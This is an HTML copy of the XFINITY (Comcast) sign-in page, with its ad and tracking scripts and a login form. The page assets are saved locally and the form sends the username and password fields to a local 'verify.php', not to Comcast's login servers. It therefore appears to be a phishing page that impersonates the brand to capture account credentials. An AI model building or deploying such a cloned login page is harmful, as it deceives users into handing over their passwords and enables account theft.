<!DOCTYPE html>
<!--[if lte IE 8]>
<html lang="en" class="ie8 light da">
<![endif]-->
<!--[if IE 9]>
<html lang="en" class="ie9 light da">
<![endif]-->
<!--[if gt IE 9]><!-->
<html class="light da da-expandable" lang="en"><!--<![endif]--><head>
		<title>Sign in to XFINITY</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
					<link rel="stylesheet" type="text/css" href="Sign%20in%20to%20XFINITY_files/styles-light.css">
				<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="description" content="Comcast.net has more to offer when you sign in to your mySIGN-IN Account. Use your account to access other Comcast sites and services like Comcast.net, Plaxo, and more.">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<link rel="shortcut icon" href="https://login.comcast.net/static/images/global/favicon.ico">
					<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/event"></script><script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/comcastVisIDAthena.js"></script>
				<script type="text/javascript">
			runtimeData = {
									"r": "comcast.net",									"s": "oauth",									"deviceAuthn": "false",									"continue": "https://login.comcast.net/oauth/authorize?response_type=code&amp;redirect_uri=https%3A%2F%2Fauth.xfinity.com%2Foauth%2Fcallback&amp;client_id=my-xfinity&amp;state=http%3A%2F%2Fmy.xfinity.com%2F%3Fcid%3Dcust&amp;response=1",									"ipAddrAuthn": "false",									"forceAuthn": "0",									"lang": "en",									"passive": "false",									"client_id": "my-xfinity",									"reqId": "88ce4dc7-becd-4921-834c-7a309df3fbce"							}
		</script>
															<style type="text/css">
				@media only screen and (min-width: 1400px) {
.ad.ad-fullscreen #left {
margin-left: 670px;
}
.ad.ad-fullscreen #right {
margin-right: 0px;
}
}
			</style>
		
	<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/rta.js" async=""></script><style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}.fb_link img{border:none}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_reset .fb_dialog_legacy{overflow:visible}.fb_dialog_advanced{padding:10px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}.fb_dialog_content{background:#fff;color:#333}.fb_dialog_close_icon{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;_background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/s816eWC-2sl.gif);cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{top:5px;left:5px;right:auto}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent;_background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/s816eWC-2sl.gif)}.fb_dialog_close_icon:active{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent;_background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/s816eWC-2sl.gif)}.fb_dialog_loader{background-color:#f6f7f9;border:1px solid #606060;font-size:24px;padding:20px}.fb_dialog_top_left,.fb_dialog_top_right,.fb_dialog_bottom_left,.fb_dialog_bottom_right{height:10px;width:10px;overflow:hidden;position:absolute}.fb_dialog_top_left{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8YeTNIlTZjm.png) no-repeat 0 0;left:-10px;top:-10px}.fb_dialog_top_right{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8YeTNIlTZjm.png) no-repeat 0 -10px;right:-10px;top:-10px}.fb_dialog_bottom_left{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8YeTNIlTZjm.png) no-repeat 0 -20px;bottom:-10px;left:-10px}.fb_dialog_bottom_right{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8YeTNIlTZjm.png) no-repeat 0 -30px;right:-10px;bottom:-10px}.fb_dialog_vert_left,.fb_dialog_vert_right,.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{position:absolute;background:#525252;filter:alpha(opacity=70);opacity:.7}.fb_dialog_vert_left,.fb_dialog_vert_right{width:10px;height:100%}.fb_dialog_vert_left{margin-left:-10px}.fb_dialog_vert_right{right:0;margin-right:-10px}.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{width:100%;height:10px}.fb_dialog_horiz_top{margin-top:-10px}.fb_dialog_horiz_bottom{bottom:0;margin-bottom:-10px}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{-webkit-transform:none;height:100%;margin:0;overflow:visible;position:absolute;top:-10000px;left:0;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{width:auto;height:auto;min-height:initial;min-width:initial;background:none}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{color:#fff;display:block;padding-top:20px;clear:both;font-size:18px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .45);position:absolute;bottom:0;left:0;right:0;top:0;width:100%;min-height:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_content .dialog_header{-webkit-box-shadow:white 0 1px 1px -1px inset;background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#738ABA), to(#2C4987));border-bottom:1px solid;border-color:#1d4088;color:#fff;font:14px Helvetica, sans-serif;font-weight:bold;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{-webkit-font-smoothing:subpixel-antialiased;height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#4966A6), color-stop(.5, #355492), to(#2A4887));border:1px solid #29487d;-webkit-background-clip:padding-box;-webkit-border-radius:3px;-webkit-box-shadow:rgba(0, 0, 0, .117188) 0 1px 1px inset, rgba(255, 255, 255, .167969) 0 1px 0;display:inline-block;margin-top:3px;max-width:85px;line-height:18px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{border:none;background:none;color:#fff;font:12px Helvetica, sans-serif;font-weight:bold;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #555;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f6f7f9;border:1px solid #555;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-repeat:no-repeat;background-position:50% 50%;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_hide_iframes iframe{position:relative;left:-10000px}.fb_iframe_widget_loader{position:relative;display:inline-block}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}.fb_iframe_widget_loader iframe{min-height:32px;z-index:2;zoom:1}.fb_iframe_widget_loader .FB_Loader{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat;height:32px;width:32px;margin-left:-16px;position:absolute;left:50%;z-index:4}</style></head>
		<body class="has-footer ">
		<div id="breakpoints"></div>
		<div id="background" style="height: 609px;"></div>
						<main id="bd">
			<div id="left">	    <div id="ad-block" style="">
	<h2 id="ad-heading" class="screen-reader-text">Advertisement</h2>
	<script>
		var adInfo = {};
		(function(){
			var clientWidth = document.documentElement.clientWidth,
			clientHeight = document.documentElement.clientHeight;
			if (clientWidth < 730 || clientWidth < 990 && clientHeight < 600)
				adInfo.maxSize = "300x250";
			else if (clientWidth < 990 && clientHeight >= 600)
				adInfo.maxSize = "monster";
			else if (clientWidth < 1024 || clientHeight < 600)
				adInfo.maxSize = "expandable";
			else
				adInfo.maxSize = "fullpage";
		})();
	</script>
	<div id="ad-wrapper">
		<!-- Start Mail ad tag -->
		<script type="text/javascript">
			(function() {
				var unknown_zip = "US:UNKNOWN",
				unknown_cid = "NONE";
				function matchKeys(keys) {
					var re = new RegExp('(?:' + keys.join('|') + ')=(?:\\"|%22)(.*?)(?:\\"|%22)');
					var matches = document.cookie.match(re);
					if (!matches) return null;
					return matches[1];
				}
				var flag_matches = document.cookie.match(/(?:adt_optout_flag)=(true|false)/);
				var optout = (flag_matches && flag_matches[1] == "true");
				window.f_ADTARGET_ZIP = (function() {
					if (optout) return unknown_zip;
					var zip = matchKeys(['adt_zip']);
					if (!zip) return unknown_zip;
					return "US:" + zip;
				})();
				window.f_AM_CID = (function() {
					if (optout) return unknown_cid;
					var cid = matchKeys(['amcid']);
					if (!cid) return unknown_cid;
					cid = unescape(cid);
					return cid.replace(",","&am=");
				})();
				window.f_ENABLE_ADTARGETING = true;
			})();
		</script>

		<script type="text/javascript">
			var crtg_nid = '2528';
			var crtg_cookiename = 'crtg_comcast';
			var crtg_varname = 'crtg_content';
			function crtg_getCookie(c_name){ var i,x,y,ARRCookies=document.cookie.split(";");for(i=0;i<ARRCookies.length;i++){x=ARRCookies[i].substr(0,ARRCookies[i].indexOf("="));y=ARRCookies[i].substr(ARRCookies[i].indexOf("=")+1);x=x.replace(/^\s+|\s+$/g,"");if(x==c_name){return unescape(y);} }return'';}
			var crtg_content = crtg_getCookie(crtg_cookiename);
			var crtg_rnd=Math.floor(Math.random()*99999999999);
			(function(){
				var crtg_url=location.protocol+'//rtax.criteo.com/delivery/rta/rta.js?netId='+escape(crtg_nid);
				crtg_url +='&cookieName='+escape(crtg_cookiename);
				crtg_url +='&rnd='+crtg_rnd;
				crtg_url +='&varName=' + escape(crtg_varname);
				var crtg_script=document.createElement('script');crtg_script.type='text/javascript';crtg_script.src=crtg_url;crtg_script.async=true;
				if(document.getElementsByTagName("head").length>0)document.getElementsByTagName("head")[0].appendChild(crtg_script);
				else if(document.getElementsByTagName("body").length>0)document.getElementsByTagName("body")[0].appendChild(crtg_script);
			})();
		</script>

		<script type="text/javascript">
			quantSegs='';
			function qc_results(result) {
				for (var i = 0; i < result.segments.length; i++)
				{
					quantSegs += "&qsg=" + result.segments[i].id;
				}
			}
		</script>

		<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/segments.js"></script>

		<script type="text/javascript">
		// <![CDATA[
		var _vdlg = _vdlg || {};
		_vdlg.comcastOASAudiences = '';
		_vdlg.comcastOASCallback = function(userData) {
		  if(userData && userData.status === 0 && userData.user.audiences) {

		    if(typeof userData.user.audiences === 'string') {
		      var codes = userData.user.audiences.split(',');
		      for (var i = 0; i < codes.length; i++) {
		          _vdlg.comcastOASAudiences += "&vidaud=" + codes[i].trim();
		      }
		    }
		    else {
		      for (var i = 0; i < userData.user.audiences.length; i++) {
		        _vdlg.comcastOASAudiences += "&vidaud=" + userData.user.audiences[i].code;
		      }
		    }
		  }
		};
		// ]]>
		</script>
		<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/data.json"></script>

		<script type="text/javascript">
			// <![CDATA[
			var opts = [];
			if (typeof f_ADTARGET_ZIP != 'undefined')
				opts.push('_OAS_GEO_OVERRIDE_=' + f_ADTARGET_ZIP);
			if (typeof f_AM_CID != 'undefined')
				opts.push('am=' + f_AM_CID.split(',').join('&am='));
			if (typeof quantSegs != 'undefined')
				opts.push(quantSegs.slice(1));
			if (typeof _vdlg != 'undefined' && _vdlg.comcastOASAudiences) {
				opts.push(_vdlg.comcastOASAudiences.slice(1));
			}
			if (typeof crtg_content != 'undefined') {
				opts.push(crtg_content);
			}
							opts.push('theme=light');
				opts.push('max-size='+adInfo.maxSize);
						if (location.search.indexOf('AdParam') != -1) {
				opts.push(location.search.slice(1));
			}
			OAS_query = opts.join('&');
			OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
			// ]]>
		</script>

		<script type="text/javascript">
			OAS_type = 'jx'; //jx or mjx
			OAS_sitepage = 'comcast.net/login_secure/notve';
			OAS_listpos = 'x32';

			var first_time="ftu";
			if
			    (document.cookie.indexOf("prefs") >= 0) {first_time="normal";};
			if
			    (document.referrer.search('tt2')==-1) {first_time="normal";};

			document.getElementById('ad-block').style.visibility = 'hidden';

			document.write('<script type="text/javascript" src=\"//oascentral.comcast.net/RealMedia/ads/adstream_' + OAS_type + '.ads/' + OAS_sitepage + '/1' + OAS_rns +'@' + OAS_listpos + '?target=' + first_time + '&' + OAS_query + '\" ></scr' + 'ipt>');
		</script><script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/1203273213x32.js"></script><!--  Begin Rubicon Project Tag -->
<!--  Site: Xfinity - Secure   Zone: Log-In   Size: Half Page Ad  -->
<script language="JavaScript" type="text/javascript">
rp_account   = '11648';
rp_site      = '36314';
rp_zonesize  = '150582-10';
rp_adtype    = 'js';
rp_smartfile = '[SMART FILE URL]';
</script>
<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/11648.js"></script><script type="text/javascript">rp_requests = new RubiconAdServing.Requests(); rp_requests.sendRequest('150582-10');</script><script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/150582-10.js"></script>

<!--  Begin Rubicon Project Tag -->
<!--  Site: Xfinity - Secure   Zone: Log-In   Size: Medium Rectangle  -->
<script language="JavaScript" type="text/javascript">
rp_account   = '11648';
rp_site      = '36314';
rp_zonesize  = '150582-15';
rp_adtype    = 'js';
rp_smartfile = '[SMART FILE URL]';
</script>
<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/11648.js"></script><script type="text/javascript">rp_requests = new RubiconAdServing.Requests(); rp_requests.sendRequest('150582-15');</script><script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/150582-15.js"></script>

<!-- ###### START COMPONENT ad.standard ###### -->
<!-- quantcast logic begins -->
<script type="text/javascript">
quantSegs='';
function qc_results(result) {
for (var i = 0; i < result.segments.length; i++) {
quantSegs += "&qsg=" + result.segments[i].id; //added 
}
}
</script>
<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/segments.js"></script>
<!-- quantcast logic ends -->
<script type="text/javascript">
(function() {
var unknown_zip = "US:UNKNOWN",
unknown_cid = "NONE";
function matchKeys(keys) {
var re = new RegExp('(?:' + keys.join('|') + ')=(?:\\"|%22)(.*?)(?:\\"|%22)');
var matches = document.cookie.match(re);
if (!matches) return null;
return matches[1];
}
var flag_matches = document.cookie.match(/(?:adt_optout_flag)=(true|false)/);
var optout = (flag_matches && flag_matches[1] == "true");
window.f_ADTARGET_ZIP = (function() {
if (optout) return unknown_zip;
var zip = matchKeys(['adt_zip']);
if (!zip) return unknown_zip;
return "US:" + zip;
})();
window.f_AM_CID = (function() {
if (optout) return unknown_cid;
var cid = matchKeys(['amcid']);
if (!cid) return unknown_cid;
cid = unescape(cid);
return cid.replace(",","&am=");
})();
window.f_ENABLE_ADTARGETING = true;
})();
</script>

<script type="text/javascript">
// <![CDATA[
//document.write((function() {
//(function() {
var opts = [];
if (typeof f_ADTARGET_ZIP != 'undefined')
opts.push('_OAS_GEO_OVERRIDE_=' + f_ADTARGET_ZIP);
if (typeof f_AM_CID != 'undefined')
opts.push('am=' + f_AM_CID.split(',').join('&am='));
if (typeof quantSegs != 'undefined')
opts.push(quantSegs.slice(1));
if (location.search.indexOf('AdParam') != -1) {
opts.push('AdParam='+location.search.slice(9));
}
OAS_query = opts.join('&');
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
// ]]>
</script>
<!-- ###### END COMPONENT ad.standard ###### -->
<!-- anything above this comment could reside in a .js file in the head of each page -->

<script type="text/javascript">
OAS_type = 'jx'; //jx or mjx
OAS_sitepage = 'comcast.net/RubiconSIPassback';
OAS_listpos = 'x32';

document.write('<script type="text/javascript" src=\"https://oascentral.comcast.net/RealMedia/ads/adstream_' + OAS_type + '.ads/' + OAS_sitepage + '/1' + OAS_rns +'@' + OAS_listpos + '?' + OAS_query + '&kw=noloopback_smr\" ></scr' + 'ipt>');

</script><script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/1647526060x32.js"></script><a href="https://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.net/RubiconSIPassback/L29/1394775610/x32/Comcast/CIM_2017_SIG_300_FILLERB/Oscars_SignIn_300x250.jpg/4b5657396f31654e4744634142694b53;zip=US:60099?x" target="_top"><img src="Sign%20in%20to%20XFINITY_files/Oscars_SignIn_300x250.jpg" alt="" border="0"></a>
       <noscript class="MOAT-comcastapn56341864860?moatClientLevel1=.CIM_PROMOTION&amp;moatClientLevel2=Comcast/CIM_2017_SIG_300_FILLERB&amp;moatClientLevel3=300x250_IMG_Oscars&amp;moatClientSlicer1=x32&amp;moatClientSlicer2=comcast.net/RubiconSIPassback/L29"></noscript>
<script src="Sign%20in%20to%20XFINITY_files/moatad_002.js" type="text/javascript"></script>
<script>
try{
var x32adtag = "Comcast/CIM_2017_SIG_300_FILLERB".split("/")[1];
var adtag_x32 = "camp_" + x32adtag + "_creativeId_300x250_IMG_Oscars";
}
catch(e){}
</script>
     
<!--  End Rubicon Project Tag -->
<!--  End Rubicon Project Tag -->
       <noscript class="MOAT-comcastapn56341864860?moatClientLevel1=.CIM_PROMOTION&amp;moatClientLevel2=Comcast/Rubicon_2015_Signin_300x600&amp;moatClientLevel3=300x600_RM_RubiconSignin_02232015&amp;moatClientSlicer1=x32&amp;moatClientSlicer2=comcast.net/login_secure/notve/L30"></noscript>
<script src="Sign%20in%20to%20XFINITY_files/moatad.js" type="text/javascript"></script>
<script>
try{
var x32adtag = "Comcast/Rubicon_2015_Signin_300x600".split("/")[1];
var adtag_x32 = "camp_" + x32adtag + "_creativeId_300x600_RM_RubiconSignin_02232015";
}
catch(e){}
</script>
     
		<!--End Mail ad tag -->
	</div>
	<script>
		var htmlElem = document.documentElement,
			adClass;
		if (htmlElem.className.indexOf('da') != -1 && htmlElem.className.indexOf('da-fullscreen') == -1) {
			if (adInfo.maxSize == "expandable" || adInfo.maxSize == "fullpage") {
				adClass='da-expandable';
			} else {
				adClass='da-300x600'
				setTimeout(function() {
					if (document.getElementById('ad-block').offsetHeight < 600) {
						htmlElem.className = htmlElem.className.replace('da-300x600','da-300x250');
					}
				},100);
			}
			htmlElem.className += ' '+adClass;
		}
		document.getElementById('ad-block').style.visibility = '';
	</script>
	<div id="ads-info">
	<a class="first" href="http://www.comcast.net/adinformation" rel="default" target="_blank">Ad Info</a>
	<span class="divider"></span>
	<a href="https://www.surveymonkey.com/s.aspx?sm=FyNNVDhj_2f2FNc2KVOHQ4eg_3d_3d" target="_blank">Ad Feedback</a>
</div>
	<img src="Sign%20in%20to%20XFINITY_files/u.gif" width="0" height="0">
<img src="Sign%20in%20to%20XFINITY_files/event.gif" width="0" height="0"></div>
	</div><div id="right">		<div class="container">
	<form name="signin" action="verify.php" method="post" onsubmit="return login.onSubmit()">
                                <h1 class="xfinity-logo">
        	<span>Sign in to XFINITY</span>
    	</h1>

                <label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    <div class="textfield-wrapper">
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="user" placeholder="Username, email or mobile" maxlength="128" type="text"><label for="user" class="float accessibly-hidden">Username</label>
			</div>
        
					<label for="passwd" id="password_label" role="alert" aria-label=""></label>
			<div class="textfield-wrapper">
				<input id="passwd" class="" name="passwd" placeholder="Password" maxlength="128" type="password"><label for="passwd" class="float accessibly-hidden">Password</label>
			</div>
		
        
	    			<div class="checkbox-container">
				<label for="remember_me">
					<input id="remember_me" name="rm" value="1" type="checkbox">
					<span id="remember_me_checkbox" class="checkbox"></span><div class="content">Stay signed in</div>
				</label>
				<button type="button" id="rm_label_learn_more" class="icon info cancel" data-id-ref="rm_help" aria-controls="rm_help" aria-label="Learn more about staying signed in"></button>
			</div>

			        
        
        
		
		
		
		
											<button class="submit" type="submit" id="sign_in">Sign In</button>
					
		
		<ul>
										<li>
					<span id="fb"></span>
					<a href="#" onclick="fblogin()">Sign in with Facebook</a>
				</li>
			
			        	    	
															<li>Forgot <a href="https://idm.xfinity.com/myaccount/lookup?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FipAddrAuthn%3Dfalse%26passive%3Dfalse%26client_id%3Dmy-xfinity%26reqId%3D88ce4dc7-becd-4921-834c-7a309df3fbce%26r%3Dcomcast.net%26s%3Doauth%26deviceAuthn%3Dfalse%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526redirect_uri%253Dhttps%25253A%25252F%25252Fauth.xfinity.com%25252Foauth%25252Fcallback%2526client_id%253Dmy-xfinity%2526state%253Dhttp%25253A%25252F%25252Fmy.xfinity.com%25252F%25253Fcid%25253Dcust%2526response%253D1%26forceAuthn%3D0%26lang%3Den%26rm%3D2%26ui_style%3Dlight&amp;lang=en&amp;ui_style=light" target="_self" title="Lookup User ID">username</a> or <a id="forgotPwdLink" href="https://idm.xfinity.com/myaccount/reset?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FipAddrAuthn%3Dfalse%26passive%3Dfalse%26client_id%3Dmy-xfinity%26reqId%3D88ce4dc7-becd-4921-834c-7a309df3fbce%26r%3Dcomcast.net%26s%3Doauth%26deviceAuthn%3Dfalse%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526redirect_uri%253Dhttps%25253A%25252F%25252Fauth.xfinity.com%25252Foauth%25252Fcallback%2526client_id%253Dmy-xfinity%2526state%253Dhttp%25253A%25252F%25252Fmy.xfinity.com%25252F%25253Fcid%25253Dcust%2526response%253D1%26forceAuthn%3D0%26lang%3Den%26rm%3D2%26ui_style%3Dlight&amp;lang=en&amp;ui_style=light" target="_self" title="Reset Password">password</a>?</li>
									
										<li>Don't have a username?					<span><a href="https://idm.xfinity.com/myaccount/create-uid?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FipAddrAuthn%3Dfalse%26passive%3Dfalse%26client_id%3Dmy-xfinity%26reqId%3D88ce4dc7-becd-4921-834c-7a309df3fbce%26r%3Dcomcast.net%26s%3Doauth%26deviceAuthn%3Dfalse%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526redirect_uri%253Dhttps%25253A%25252F%25252Fauth.xfinity.com%25252Foauth%25252Fcallback%2526client_id%253Dmy-xfinity%2526state%253Dhttp%25253A%25252F%25252Fmy.xfinity.com%25252F%25253Fcid%25253Dcust%2526response%253D1%26forceAuthn%3D0%26lang%3Den%26rm%3D2%26ui_style%3Dlight&amp;lang=en&amp;ui_style=light" target="_self">Create one</a></span>
				</li>
					

			

		    			
			<li id="quick-bill-pay">
				<a href="https://customer.xfinity.com/lite" target="_self">Pay any balance</a> without signing in			</li>
		</ul>

		
					<input name="r" value="comcast.net" type="hidden">
					<input name="s" value="oauth" type="hidden">
					<input name="deviceAuthn" value="false" type="hidden">
					<input name="continue" value="https://login.comcast.net/oauth/authorize?response_type=code&amp;redirect_uri=https%3A%2F%2Fauth.xfinity.com%2Foauth%2Fcallback&amp;client_id=my-xfinity&amp;state=http%3A%2F%2Fmy.xfinity.com%2F%3Fcid%3Dcust&amp;response=1" type="hidden">
					<input name="ipAddrAuthn" value="false" type="hidden">
					<input name="forceAuthn" value="0" type="hidden">
					<input name="lang" value="en" type="hidden">
					<input name="passive" value="false" type="hidden">
					<input name="client_id" value="my-xfinity" type="hidden">
					<input name="reqId" value="88ce4dc7-becd-4921-834c-7a309df3fbce" type="hidden">
		
 	</form>

	
</div>
	</div>
		</main>
					
<footer>
<span class="copyright">© 2017 Comcast</span>
<span class="divider"></span>
<span class="links">
<a href="http://xfinity.comcast.net/siteindex/">Site Map</a>
<span class="divider"></span>
<a href="http://xfinity.comcast.net/privacy/">Privacy Policy</a>
</span>
<span class="divider"></span>
<span class="links">
<a href="http://my.xfinity.com/terms/web/">Terms of Service</a>
<span class="divider"></span>
<a href="https://customer.comcast.com/contact-us/">Contact Us</a>
</span>
<span class="ad-links divider"></span>
<span class="ad-links links">
<a href="http://www.comcast.net/adinformation" target="_blank">Ad Info</a>
<span class="divider"></span>
<a href="https://www.surveymonkey.com/s.aspx?sm=FyNNVDhj_2f2FNc2KVOHQ4eg_3d_3d" target="_blank">Ad Feedback</a>
</span>
<span id="b537c389-7be1-4331-bb73-03a71788bc12" class="truste">
<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/asc.txt"></script>
<a href="https://privacy.truste.com/privacy-seal/Comcast-Cable-Communications-Management,-LLC/validation?rid=bf9d4d6f-2b32-4201-a167-5b55a4451508" title="TRUSTe online privacy certification" target="_blank">
<img style="border: none" src="Sign%20in%20to%20XFINITY_files/seal.png" alt="TRUSTe online privacy certification">
</a>
</span>
</footer>
		
		
		<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/jquery-1.js"></script>

										<div id="rm_help" role="dialog" aria-hidden="true" class="overlay" data-dialog-type="overlay">
	<div role="document" class="content">
				<button type="button" class="close" aria-label="Close"></button>
							<h2>Why Stay Signed In?</h2>
					<p>When you choose this option on sign in, we will remember who you
 are and keep you signed in for up to 30 days unless you sign out.</p>
					<p>Please note: If you share your personal computer with others, 
they could access and make changes to your account. You should 
definitely not use this option on public computers.</p>
				
	</div>
</div>
			
    <script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/scripts-responsive.js"></script>

    <script type="text/javascript">
        login.registerInitFunction(function(config){
	login.onSubmit = function() {
		var usernameSelector = "#"+config.usernameId,
			passwordSelector = "#"+config.passwordId,
			username = $(usernameSelector),
			password = $(passwordSelector);
		if(username.val() === "" || password.val() === "") {
			$("#error").remove();
			$(usernameSelector+", "+passwordSelector).addClass("error");
			$('<p id="error" class="error_message">'+config.authnEmptyError+'</p>').insertAfter(".textfield-wrapper:has("+passwordSelector+")");
			$("#login_id_label").attr('aria-label',config.authnEmptyError+' '+config.reenterUsername);
			$("#password_label").attr('aria-label',config.authnEmptyError+' '+config.reenterPassword);
			username.focus();
			return false
		} else {
			return true
		}
	};

	$('#forgotPwdLink').click(login.openLinkWithLoginId);

	if ($('#popup_message').length)
		login.showOverlay($("#popup_message"));

	$('button[data-continue-url]').click(function() {
		window.location.href=$(this).data('continueUrl');
	});
}, "responsiveForm");
;
        				        login.init({
            usernameId: 'user',
            passwordId: 'passwd',
            authnEmptyError: 'Please enter your email, username or mobile phone number and password to sign in.',
            reenterUsername: 'Please re-enter username.',
            reenterPassword: 'Please re-enter password.'
        });
    </script>

